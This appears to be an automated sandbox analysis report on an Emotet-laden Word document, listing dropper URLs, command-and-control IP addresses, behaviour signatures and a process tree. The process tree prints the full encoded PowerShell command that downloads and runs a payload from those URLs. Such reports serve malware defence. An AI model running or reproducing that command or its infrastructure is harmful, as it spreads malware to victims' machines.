Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    29-01-2020 04:08

General

  • Target

    4ebe53c80f9e61eec98b08e15ea337629a3d6958ffb3db3221a5afb3a72b7863.doc

  • Sample

    200129-3g2x6xxq7e

  • SHA256

    4ebe53c80f9e61eec98b08e15ea337629a3d6958ffb3db3221a5afb3a72b7863

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.icairjy.org/cgi-bin/WIeU/

exe.dropper

http://beta.theeyestyles.com/wp-admin/34sz2/

exe.dropper

http://rcsic.technocloudtech.com/jnzor/CeI/

exe.dropper

https://www.expertencall.com/pts_bilderupload/plKooJuF/

exe.dropper

https://lifebrate.com/9jjsf/g50o/

Extracted

Family

emotet

C2

108.190.109.107:80

174.83.116.77:80

125.207.127.86:80

74.208.45.104:8080

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

24.164.79.147:8080

88.249.120.205:80

91.73.197.90:80

60.250.78.22:443

90.69.145.210:8080

101.187.237.217:80

85.152.174.56:80

190.117.226.104:80

190.12.119.180:443

186.86.247.171:443

47.153.183.211:80

37.187.72.193:8080

181.13.24.82:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Program crash 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4ebe53c80f9e61eec98b08e15ea337629a3d6958ffb3db3221a5afb3a72b7863.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4804
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABXAGcAdQBuAGkAcQBwAHIAeQBvAGQAawA9ACcAVgBoAHcAdABuAGYAcABiAG8AJwA7ACQASABzAHoAZQB0AGQAagBkAHMAagBsACAAPQAgACcANAAzADEAJwA7ACQAUQBxAG4AeQB5AHAAcQB1AD0AJwBKAGEAeABhAGIAeQBpAGUAdgB0AHUAeQAnADsAJABSAGgAYQBzAGwAcwB5AGUAbgBmAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAcwB6AGUAdABkAGoAZABzAGoAbAArACcALgBlAHgAZQAnADsAJABXAHEAeAB3AGMAdQBzAGoAegBoAHoAegBlAD0AJwBPAHQAZQBpAGQAeAB3AHcAbQBlAHIAJwA7ACQARQBoAGUAYgBkAHAAYwBpAHAAeQB3AD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcARQBCAGMATABpAGUAbgB0ADsAJABFAGYAZABrAHAAaQBwAHcAZQBkAGsAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBpAGMAYQBpAHIAagB5AC4AbwByAGcALwBjAGcAaQAtAGIAaQBuAC8AVwBJAGUAVQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAdABhAC4AdABoAGUAZQB5AGUAcwB0AHkAbABlAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADMANABzAHoAMgAvACoAaAB0AHQAcAA6AC8ALwByAGMAcwBpAGMALgB0AGUAYwBoAG4AbwBjAGwAbwB1AGQAdABlAGMAaAAuAGMAbwBtAC8AagBuAHoAbwByAC8AQwBlAEkALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGUAeABwAGUAcgB0AGUAbgBjAGEAbABsAC4AYwBvAG0ALwBwAHQAcwBfAGIAaQBsAGQAZQByAHUAcABsAG8AYQBkAC8AcABsAEsAbwBvAEoAdQBGAC8AKgBoAHQAdABwAHMAOgAvAC8AbABpAGYAZQBiAHIAYQB0AGUALgBjAG8AbQAvADkAagBqAHMAZgAvAGcANQAwAG8ALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFAAdQBnAHIAYwByAGMAaABzAHUAPQAnAFoAYQBhAHAAYQBiAHUAagAnADsAZgBvAHIAZQBhAGMAaAAoACQATABqAHkAZQB3AGYAaQBnAGsAcwB1AHUAIABpAG4AIAAkAEUAZgBkAGsAcABpAHAAdwBlAGQAawApAHsAdAByAHkAewAkAEUAaABlAGIAZABwAGMAaQBwAHkAdwAuACIAZABPAFcAYABOAGAATABgAE8AQQBkAGYASQBMAEUAIgAoACQATABqAHkAZQB3AGYAaQBnAGsAcwB1AHUALAAgACQAUgBoAGEAcwBsAHMAeQBlAG4AZgByACkAOwAkAFoAcQBxAGsAeQB6AHUAawByAD0AJwBJAHQAZgBiAGkAeABtAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABSAGgAYQBzAGwAcwB5AGUAbgBmAHIAKQAuACIATABgAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAwADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABSAGgAYQBzAGwAcwB5AGUAbgBmAHIAKQA7ACQATQBoAGQAeAB2AGcAbABjAHcAagB3AGgAdQA9ACcAUgBzAGMAbQBoAGMAaAB5ACcAOwBiAHIAZQBhAGsAOwAkAFYAbwBzAGUAaABtAGUAbABhAD0AJwBHAGIAZQBvAHkAcABvAHQAbQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAGgAZgB0AHQAdwBvAHcAZgBpAD0AJwBBAHMAdAB5AHAAdwByAHcAdABtAHMAJwA=
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:4396
    • C:\Users\Admin\431.exe
      "C:\Users\Admin\431.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4496
      • C:\Users\Admin\431.exe
        --f7838c50
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:4516
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 276
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          PID:4244
  • C:\Windows\SysWOW64\mexicoses.exe
    "C:\Windows\SysWOW64\mexicoses.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:4560
    • C:\Windows\SysWOW64\mexicoses.exe
      --91c1a042
      2⤵
      • Suspicious behavior: EmotetMutantsSpam
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4544

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\431.exe

  • C:\Users\Admin\431.exe

  • C:\Users\Admin\431.exe

  • C:\Windows\SysWOW64\mexicoses.exe

  • C:\Windows\SysWOW64\mexicoses.exe

  • memory/4244-18-0x0000000004910000-0x0000000004911000-memory.dmp

    Filesize

    4KB

  • memory/4244-19-0x0000000004910000-0x0000000004911000-memory.dmp

    Filesize

    4KB

  • memory/4244-21-0x00000000051A0000-0x00000000051A1000-memory.dmp

    Filesize

    4KB

  • memory/4244-79-0x0000000005290000-0x0000000005291000-memory.dmp

    Filesize

    4KB

  • memory/4496-9-0x0000000000A60000-0x0000000000A75000-memory.dmp

    Filesize

    84KB

  • memory/4516-11-0x0000000000740000-0x0000000000755000-memory.dmp

    Filesize

    84KB

  • memory/4516-12-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

  • memory/4544-16-0x0000000000710000-0x0000000000725000-memory.dmp

    Filesize

    84KB

  • memory/4544-17-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

  • memory/4560-14-0x0000000000E00000-0x0000000000E15000-memory.dmp

    Filesize

    84KB